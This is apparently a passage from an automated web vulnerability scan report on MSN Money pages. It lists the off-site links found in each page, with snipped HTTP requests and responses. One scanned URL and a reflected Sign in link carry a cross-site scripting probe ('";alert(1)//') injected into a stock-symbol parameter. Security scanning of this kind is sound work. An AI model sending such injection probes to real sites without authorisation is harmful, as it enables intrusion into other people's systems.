...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410680&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.224. http://redacted/investor/charts/chartdl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296400096&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:08:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296400096&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.225. http://redacted/investor/partsub/funds/etfperformancetracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s=&o=&p=0&tab=mkt

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353575&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&s=&o=&p=0&tab=mkt&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s=&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:12:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 65192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353575&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&s=&o=&p=0&tab=mkt&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.226. http://redacted/investor/partsub/funds/etfperformancetracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410533&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&p=0&tab=mkt&s=ytd&o=d&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:02:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410533&rver=5.5.4177.0&wp=MBI&wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&p=0&tab=mkt&s=ytd&o=d&lc=1033&id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.227. http://redacted/investor/partsub/funds/etfperformancetracker.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s=&o=&p=0&tab=mkt

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js
http://batstrading.com/
http://bing.com/
http://calendar.live.com/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://insidemsn.wordpress.com/
http://mail.live.com/
http://mail.live.com/?rru=compose
http://mail.live.com/?rru=contacts
http://mail.live.com/?rru=inbox
http://msn.whitepages.com/
http://msnportalmoney.112.2o7.net/b/ss/msnportalmoney/1/H.1--NS/0
http://myhomeredacted/
http://switch.redcated/action/MSN_enUS_Money
http://www.bing.com/customizeBrowser
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.live.com/live/search/search.xml
http://www.morningstar.com/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.telekurs.com/tkfich_index/tkhoch_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410534&rver=5.5.4177.0&wp=MBI&wreply=http://moneycentral.redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&s=&o=&p=0&tab=mkt&lc=1033&id=229
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:02:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 65192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
